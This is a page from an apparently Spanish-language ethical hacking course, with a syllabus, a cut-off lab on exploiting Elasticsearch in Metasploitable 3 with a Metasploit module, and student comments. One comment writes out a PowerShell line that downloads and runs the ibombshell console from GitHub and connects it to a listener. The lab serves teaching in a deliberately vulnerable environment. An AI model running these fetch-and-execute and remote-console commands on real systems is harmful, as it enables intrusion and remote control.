Bienvenida y panorama general

1

Seguridad Informática y Ética en el Hacking

2

Panorama General de la Seguridad Informática y sus Principales Amenazas

3

Gestión y Clasificación de Vulnerabilidades en Sistemas Informáticos

4

Amenazas y Ataques Cibernéticos: Conceptos y Tipos Comunes

5

Instalación de Kali Linux y configuración de entorno de pruebas

6

Instalación y configuración de máquinas virtuales vulnerables en Linux

7

Instalación y Configuración de Packer, Vagrant y Git en Windows

8

Explotación de Vulnerabilidades en Aplicaciones Web

Introducción al Hacking Ético

9

Diseño de Experiencias de Usuario en Aplicaciones Móviles

10

Ética y Hacking Ético: Fundamentos y Aplicaciones

11

Búsqueda Avanzada de Información en Fuentes Abiertas

12

Uso de Herramientas de Hacking para Resolución de Retos Cibernéticos

13

Fundamentos del Ethical Hacking y Certificaciones Internacionales

Pentesting

14

Prueba de seguridad: conceptos, importancia y recomendaciones

15

Pruebas de Seguridad: Tipos y Fases Esenciales

16

Búsqueda de Claves Secretas en Repositorios Git con Kali Linux

17

Escaneo de Redes y Puertos con Nmap en Kali Linux

18

Escaneo de Redes con Nmap en Kali Linux

19

Resolución de retos con herramientas de seguridad web

20

Explotación de Vulnerabilidades en Sistemas con Nexus y Metasploit

21

Explotación de Vulnerabilidades con Elasticsearch y Ibombshell

Estándares y aspectos legales

22

Estándares y Legislación en Seguridad de la Información

23

Contratos Informáticos: Tipos y Elementos Esenciales

24

Ciberdelitos y Convenio de Budapest: Estrategias de Persecución

Casos típicos de ataques

25

Análisis Estático de Malware: Herramientas y Técnicas Básicas

26

Análisis Dinámico de Malware: Uso de Herramientas y Técnicas Básicas

27

ARP Spoofing: Ataques y Protección en Redes TCP/IP

28

Ataques de Hombre en el Medio: Conceptos y Ejecución Práctica

29

Ataques de Denegación de Servicio: Uso de LOIC y HOIC

30

Ingeniería Social: Técnicas y Uso de Social Finish

Controles y mecanismos de seguridad

31

Políticas de Seguridad y Controles de Acceso en Empresas

32

Resolución de Retos de Seguridad en San Holidays Challenge

33

Copias de Seguridad: Tipos, Estrategias y Protección de Datos

34

Instalación y configuración de IDS con Snort en Linux

35

Gestión de Riesgos y Modelado de Amenazas en Seguridad Informática

Explotación de Vulnerabilidades con Elasticsearch y Ibombshell

21/35

Lectura

Para esta práctica se aprovechará la vulnerabilidad de elasticsearch en Metasploitable 3. Para esto iniciamos msfconsole y seleccionar el exploit a utilizar con el comando use de la herrramienta:
Use exploit/multi/elasticsearch/script_mvel_rce
Captura de Pantalla 2019-04-29 a la(s) 17.57.27.png

...

Regístrate o inicia sesión para leer el resto del contenido.

Aportes 17

Preguntas 5

Ordenar por:

¿Quieres ver más aportes, preguntas y respuestas de la comunidad?

“Great power involves great responsibility”
Franklin D. Roosevelt
cita original
“Today we have learned in the agony of war that great power involves great responsibility. Today we can no more escape the consequences of German and Japanese aggression than could we avoid the consequences of attacks by the Barbary Corsairs a century and a half before.
We, as Americans, do not choose to deny our responsibility.”

**Error:** `Exception calling “DownloadString” with “1” argument(s): "The request was aborted: Could not create SSL/TLS secure channel."` **Solución:** PowerShell, especialmente en versiones más antiguas, no siempre utiliza TLS 1.2 por defecto, que es el protocolo de seguridad requerido por muchos sitios web modernos, incluido GitHub. Puedes forzar a PowerShell a usar TLS 1.2 con el siguiente comando: `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12`

Se puede escalar de privilegios en un objetivo mediante el UAC, donde igual podemos obtener la contraseña de inicio de sesión.

Tengo una duda. y viene referente al comentario anterior.
supongamos que no creo el usuario remoto. ya que al momento de explotar el elasticsearch, nos da permisos de administrador.

podriamos ejecutar el powershell desde lineas de comandos llendo ala direccion.
C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
desde alli suministrar el comando.
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)
posteriormente.
console -Silently -uriConsole http://192.168.2.5:8080

Gracias

Al ejecutar el payload dice “java has not been ecexuted, aborting…” y no me deja ingresar a la máquina metasplotable

Buen dia profe, tengo problemas al ejecutar el ibombshell, me aparece el siguiente error https://imgur.com/qBumcEY aun asi teniendo el python 3.6 https://imgur.com/QApoeyB mas sin envargo leyendo entre el post de github note que hay que tener instalado powershell en el kali, el problema esta que al instalarlo siguiendo los pasos desde la pagina https://www.kali.org/tutorials/installing-powershell-on-kali-linux/ ya al final me salta el siguiente error https://imgur.com/f9ILSQm y de hay no he podido pasar

Buena lectura

Buenas tardes.cuando ejecuto el exploit multi/elasticsearch me dice que est :java has no be executed,aborting.Por que puede ser?

muchas gracias

Excelente laboratorio.

Duda, siguiendo los pasos me doy cuenta que la opción de acceso remoto se encuentra deshabilitada por defecto. como podría activarla desde la shell(cmd) que se creo.

ya que trato de conectarme via rdesktop ip -u “usuario” -p “contraseña” y la coneccion es unable.
probe desde una terminal windows (cliente remoto) y sigue presentandose.

Excelente documento.
Pregunta. Tengo problemas para abrir Nessus, me dice que la base de datos esta corrupta. He buscado pero no logro solucionarlo. Algun companero con el mismo problema?

¿Cómo llegamos a la conclusión que el equipo metasploitable tiene la vulnerabilidad de elasticsearch? He ralizado un escaneo con Nessus y no ha encontrado dicha vulnerabilidad. Gracias.

Muy util esta Practica, sin embargo me toco para efectos del ejercicio crear el usuario pedro directamente en la maquina con metaexploitable3 ya que el creado a través de Kali nunca lo vi reflejado.
Posterior a lo anterior es una excelente clase…

Hola a todos
Disculpen para que se creó ibombshell y que es eso de los guerreros (warriors)
y de paso alguien puede explicar que se está haciendo exactamete a partir de que empezamos con lo de ibombshell
porfa alguien que mande mas info porque me quedé a medias JSJSJS 🤣🤣🤣🤣

Excelente practica, sin embargo al crear desde mi maquina de Kali el usuario pedro este nunca se me vio reflejado en la maquina donde esta instalado el metaexploitable3, por lo anterior y para efectos del laboratorio la cree directamente pudiendo así realizar la practica.

de esta practica me quedo la inquietud de si al momento de crear el usuario pedro nunca le asigne privilegios de administrador como como podría a través de este ejecutar Powershell?.

En líneas generales me parece un laboratorio muy interesante y enriquecedor.